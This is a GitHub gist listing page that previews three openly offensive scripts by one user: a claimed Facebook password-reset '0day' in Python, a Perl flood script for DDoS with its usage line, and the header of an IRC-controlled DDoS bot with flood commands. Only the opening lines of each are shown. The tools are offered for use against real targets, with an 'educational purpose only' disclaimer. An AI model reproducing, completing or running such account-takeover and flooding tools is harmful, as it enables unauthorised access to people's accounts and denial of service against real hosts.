Skip to content

Instantly share code, notes, and snippets.

View dreadpiratesr's full-sized avatar

niño orsino dreadpiratesr

View GitHub Profile
@dreadpiratesr
dreadpiratesr / [PYTHON]
Last active April 8, 2022 03:23
Facebook Reset Code 0day Python Version
#Facebook Reset Code 0day Python Version
#If you want to edit this script you are free i don't give a fuck cause it tooks 2 minutes to write xD \!/
#As a temporarily solution, use requesocks Module
#How to install?
#with pip : pip install requesocks
#with easy_install : easy_install requesocks
import urllib2 ,sys ,re
import os
import ssl
@dreadpiratesr
dreadpiratesr / (DDoS)
Created October 13, 2015 20:26
Perl Flood Script (DDoS)
[Save file as reckz.pl, Put it in Perl/Bin]
#!/usr/bin/perl START SCRIPT
use Socket;
use strict;
if ($#ARGV != 3) {
print "reckz.pl <ip> <port> <size> <time>\n\n";
print " port=0: use random ports\n";
@dreadpiratesr
dreadpiratesr / DDoS bot
Created October 13, 2015 20:24
Undernet DDoS bot
#!/usr/bin/perl
######################################################################################################################
######################################################################################################################
## DDoS Perl IrcBot v1.0 / 2015 by Orsineante Security Team ## [ Help ] ###########################################
## Stealth MultiFunctional IrcBot writen in Perl #######################################################
## Teste on every system with PERL instlled ## !u @system ##
## ## !u @version ##
## This is a free program used on your own risk. ## !u @channel ##
## Created for educational purpose only. ## !u @flood ##